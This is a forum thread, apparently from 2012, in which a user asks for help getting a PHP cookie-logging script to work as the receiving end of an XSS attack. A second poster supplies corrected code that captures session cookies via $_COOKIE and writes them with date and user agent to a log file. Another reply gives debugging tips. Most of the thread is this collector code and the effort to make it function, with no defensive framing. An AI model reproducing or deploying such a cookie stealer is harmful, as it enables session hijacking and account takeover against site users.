April 13, 2012 at 6:25 pm #7514wlandymoreParticipant
Hey, I’ve been working on this for a bit and I have a php file that I’m trying to redirect to a test server and then get the cookie with XSS basically.
My php file has:
$cookie = INI_Get(‘session.cookie_httponly’);
$date = date (“l ds of F Y h:i:s A”);
$user_agent = $_SERVER;
$file = fopen(‘log.txt’, ‘a’);
fwrite($file, “DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie n”);
So it’s writing everything else to the file but the cookie part just shows:
and there is no sessionId, etc.
I tried using other things like “session_Get_Cookie_Params()” but that just gave me: COOKIE: array
If I go to the website and make a post that has a link for “alert(‘document.cookie’)” then it spits the session ID out right away. How can I basically do the same thing only write it to the file?
April 13, 2012 at 6:59 pm #46894BillVParticipant
Well, for one, you likely need ‘session_start();’ at the top of your script to even have a PHP session.
Second, use the $_COOKIE variable to grab the session identifier if that’s what you’re after.
I commented out your header redirect and cookie portions, rewrote with the above and echoed the session id (and your log.txt still works and writes the session ID in there).
//$cookie = INI_Get('session.cookie_httponly');
$cookie = $_COOKIE;
$date = date ("l ds of F Y h:i:s A");
$user_agent = $_SERVER;
$file = fopen('log.txt', 'a');
fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie n");
April 14, 2012 at 8:51 am #46895GromicParticipant
ok this might sound odd – and it’s just a thought …so don’t get me wrong, but do you start your html file in a “server-context” meaning is it in your htdocs or do you just open it on your harddrive?
Since if you do the second it won’t work or at least you cannot read the cookies from localhost …(Happend to me too…an alertbox on the page worked however php script could’t read cookies…).
For “debuggin” try to throw both scripts in your htdocs … and look if the php script gets the cookies…
Don’t know if this helps, was just a thought….
April 17, 2012 at 5:55 pm #46896wlandymoreParticipant
Thanks. It was already in the htdocs and I also tried another hosted webserver but it wasn’t working. Not sure what the issue is there but it just won’t get the cookie. :'(
- You must be logged in to reply to this topic.